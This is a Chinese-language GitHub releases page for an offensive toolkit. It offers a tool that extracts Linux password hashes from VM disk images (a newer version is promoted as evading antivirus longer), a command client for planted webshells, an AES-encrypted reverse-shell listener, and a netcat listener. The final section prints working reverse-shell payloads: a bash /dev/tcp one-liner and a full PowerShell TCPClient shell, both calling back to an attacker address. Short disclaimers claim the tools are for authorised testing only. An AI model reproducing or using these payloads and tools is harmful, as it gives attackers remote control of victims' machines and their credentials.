Releases: 0x7556/hacktool
Releases · 0x7556/hacktool
Release list
vmLinuxHash V1.0
vmLinuxHash — Linux 虚拟机密码Hash提取工具 V2.0
vmLinuxHash 是一款用于离线提取 Linux 虚拟机密码Hash提取的轻量级取证工具。它可直接解析VMDK、RAW/IMG、QCOW2、VDI 四种主流磁盘镜像格式,在不启动虚拟机、无需 root 权限的情况下,离线读取并提取 Linux 系统中的用户凭据Hash信息,适用于红队渗透、取证分析及内部安全审计等场景。
vmLinuxHash 是一款用于离线提取 Linux 虚拟机密码哈希的轻量级工具。它可直接解析 VMware VMDK 虚拟磁盘文件,在不启动虚拟机、无需 root 权限的情况下,离线读取并提取 Linux 系统中的用户凭据哈希信息,适用于红队渗透、取证分析及内部安全审计等场景。
当前Bin文件为V1.0,V2.0在星球下载(用户少免杀时间更久)
WolfShell CMD V1.0
全平台WolfShell命令行版
简介
Wshell 是一个用于上传至目标内网,远程连接WolfShell执行命令的工具。它支持多种平台,包括 Windows、ARM、Linux、MIPS、MIPSLE 和 macOS。
用法
Wshell 的用法如下:
wshell.exe <URL> <Password> <Command><URL>:远程服务器的 URL 地址<Password>:远程服务器的密码<Command>:要在远程服务器上执行的命令
支持的平台
Wshell 提供了多个版本的二进制文件,以支持不同的平台:
wshell.exe:Windows 平台(x86)wshell.arm:ARM 平台wshell.lnx:Linux 平台wshell.mips:MIPS 平台wshell.mipsle:MIPSLE 平台wshell_64.mac:macOS 平台(64位)
示例
以下是一些使用 Wshell 的示例:
- 在 Windows 平台上执行命令:
wshell.exe http://target.com/wolf.aspx WolfShell whoami- 在 Linux 平台上执行命令:
./wshell.lnx http://target.com/wolf.aspx WolfShell whoami- 在 macOS 平台上执行命令:
./wshell_64.mac http://target.com/wolf.aspx WolfShell whoami免责声明
- 使用本工具,请遵循相关法律法规,确保在授权的环境中进行测试和使用。
- 本工具仅供教育和研究目的,任何滥用行为将由用户自行承担后果。
Wolf NC AES Shell 1.0
Wolf AES NC - 加密反弹Shell文档
Wolf AES NC 是一个基于AES加密的反弹Shell工具,采用WolfHash通信密钥认证机制,支持自定义端口和密码。
功能特性
- AES-256加密通信:所有数据传输均使用AES加密
- WolfHash密钥认证:基于WolfHash的双向身份验证
- 灵活配置:支持自定义监听端口和通信密钥
- 持久监听:服务端支持多客户端连接,自动清理断开连接
- 命令交互:实时执行远程命令并返回结果
使用方法
基础启动
wolfnc.exe
- 监听端口:7556(默认)
- 通信密钥:ca63457538b9b1e0(默认)
自定义端口
wolfnc.exe 8888
- 监听端口:8888
- 通信密钥:ca63457538b9b1e0(默认)
自定义端口与密钥
wolfnc.exe 8888 ca63457538b9b342
- 监听端口:8888
- 通信密钥:ca63457538b9b342
工作流程
| 阶段 | 描述 |
|---|---|
| 服务端初始化 | 在指定端口(默认7556)启动监听 |
| 客户端连接 | 客户端连接后,显示连接信息(IP:端口) |
| 命令交互 | 在CMD >提示符后输入命令,实时执行并返回结果 |
| 会话终止 | 输入exit或客户端断开连接后,进行清理操作 |
| 恢复监听 | 自动返回监听状态,等待下一个客户端连接 |
连接示例
>wolfnc.exe 8888 ca63457538b9b342
WolfShell AES NC 1.0
Listening on port: 8888
Client connected: 192.168.50.31:65181
CMD > net user
\\WIN7 的用户帐户
[返回用户列表结果]
CMD > ipconfig
[返回网络配置结果]
CMD > exit
Connection closed.
Listening on port: 8888
密钥管理
安全建议:
- 定期更换通信密钥,避免使用默认密钥
- 在生产环境中使用强随机密钥
- 密钥仅在授权用户之间传递
故障排除
| 问题 | 原因 | 解决方案 |
|---|---|---|
| 端口被占用 | 指定端口已被其他进程使用 | 更换端口:wolfnc.exe [新端口] |
| 连接失败 | 密钥不匹配 | 确认客户端和服务端密钥一致 |
| 命令无响应 | 网络连接中断 | 检查网络连接,重新连接 |
免责声明
- 使用本工具,请遵循相关法律法规,确保在授权的环境中进行测试和使用。
- 本工具仅供教育和研究目的,任何滥用行为将由用户自行承担后果。
全平台NC反弹Shell监听器 20260607
VPS正常NC监听
默认监听端口
直接运行 7556端口
Win VPS监听指定端口
nc.exe 4444Linux VPS监听指定端口
./nc.lnx 4444监听指定端口
nc.exe 4444
./nc.lnx 4444被控端反弹Shell
Linux反弹shell
bash -i >& /dev/tcp/192.168.50.31/7556 0>&1Windows反弹shell
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('192.168.50.31',7556);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"免责声明
- 使用本工具,请遵循相关法律法规,确保在授权的环境中进行测试和使用。
- 本工具仅供教育和研究目的,任何滥用行为将由用户自行承担后果。